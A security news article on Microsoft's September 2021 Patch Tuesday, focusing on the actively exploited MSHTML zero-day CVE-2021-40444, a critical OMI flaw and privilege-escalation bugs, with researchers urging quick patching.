In September’s Patch Tuesday crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which – the Windows MSHTML zero-day – has been under active attack for nearly two weeks.
One other bug is listed as publicly known but isn’t (yet) being exploited. Immersive Labs’ Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it’s “quite a light Patch Tuesday” – at least on the surface, that is.
The flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.
Of the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.
Over the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the Zero Day Initiative noted.
Some observers pegged the top patching priority in this month’s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft’s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.
Disclosed on Sept. 7, it’s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.
Under Active Attack: CVE-2021-40444
It’s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it’s been nearly a week since attackers started to share blueprints on how to carry out an exploit.
Microsoft said last week that the flaw could let an attacker “craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,” after which “the attacker would then have to convince the user to open the malicious document.” Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a novel malware-obfuscation technique to disable malicious macro warnings and deliver the ZLoader trojan.
An attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.
Satnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.
“There are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,” Narang told Threatpost.
Last Wednesday, Sept. 8, Kevin Beaumont – head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft – noted that the exploit had been in the wild for about a week or more.
It got worse: Last Thursday, Sept. 9, threat actors began sharing exploit how-tos and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are “simple to follow and [allow] anyone to create their own working version” of the exploit, “including a Python server to distribute the malicious documents and CAB files.”
It took the publication all of 15 minutes to recreate the exploit.
A week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had urged mitigations of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.
Last week, the company didn’t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.
Microsoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.
In spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.
Mitigations That Don’t Mitigate
Tracked as CVE-2021-40444, the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended – mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.
Emphasis on “try to:” Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to modify the exploit so that it didn’t use ActiveX, effectively skirting Microsoft’s mitigations.
The Zero Day Initiative said that for now, the most-effective defense is “to apply the patch and avoid Office docs you aren’t expecting to receive.”
Be sure to carefully review and install all the needed patches for your setup: There’s a long list of updates for specific platforms, and it’s important not to slather on too thin a layer of protection.
Credit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.
Baddest Bug Award
The award for baddest bug – or at least, the one with the highest severity rating, with a CVSS score of 9.8 – goes to CVE-2021-38647: a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.
“This vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,” the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.
Yet More PrintNightmare Patches
These are the three latest fixes in a steady stream of patches for flaws in Windows Print Spooler that followed the disclosure of PrintNightmare in June. This probably won’t be the last patch in that parade: Tenable’s Narang told Threatpost that “researchers continue to discover ways to exploit Print Spooler” and that the firm expects “continued research in this area.”
Only one – CVE-2021-38671 – of today’s patch trio is rated as “exploitation more likely.” Regardless, organizations should prioritize patching these flaws as “they are extremely valuable to attackers in post-exploitation scenarios,” Narang observed.
More ‘Exploitation More Likely’
Immersive’s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver (CVE-2021-36955, CVE-2021-36963, CVE-2021-38633) are also noteworthy, all of them being listed as “exploitation more likely.”
“Local priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,” Breen said via email. “This allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.”
One glaring example of that emerged in May, when hundreds of millions of Dell users were found to be at risk from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.
The three exploits Microsoft patched on Tuesday aren’t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.
Two other vulnerabilities – CVE-2021-38639 and CVE-2021-36975, both Win32k escalation of privilege flaws – have also been listed as “exploitation more likely” and, together, cover the full range of supported Windows versions.
Breen said that he’s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They’re not rated as high a severity risk as RCE bugs, but “these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,” he asserted. “If you can block them here you have the potential to significantly limit their damage.”
he added, “If we assume a determined attacker will be able to infect a victim’s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,” Breen said.
Still, This RCE Is Pretty Important
Danny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to CVE-2021-36965 – an important-rated Windows WLAN AutoConfig Service RCE vulnerability – given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.
The WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.
The patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.
As the Zero Day Initiative explained, that means an attacker could “completely take over the target – provided they are on an adjacent network.” That would come in quite handy in a coffee-shop attack, where multiple people use an unsecured Wi-Fi network.
This one “is especially alarming,” Kim said: Think SolarWinds and PrintNightmare.
“As recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,” he said in an email.
Kim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.
“It specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker’s end goal,” he predicted. “Remote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise’s data.”
The Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so “don’t let the adjacent aspect of this bug diminish the severity,” it said. “Definitely test and deploy this patch quickly.”
And Don’t Forget to Patch Chrome
Breen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft’s Chromium-based Edge.
Browsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.
“I cannot underestimate the importance of patching your browsers and keeping them up to date,” he stressed. “After all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you’re thinking about your online banking or the data collected and stored by your organization’s web apps, they could all be exposed by attacks that exploit the browser.”
It’s time to evolve threat hunting into a pursuit of adversaries. JOIN Threatpost and Cybersixgill for Threat Hunting to Catch Adversaries, Not Just Stop Attacks and get a guided tour of the dark web and learn how to track threat actors before their next attack. REGISTER NOW for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill’s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.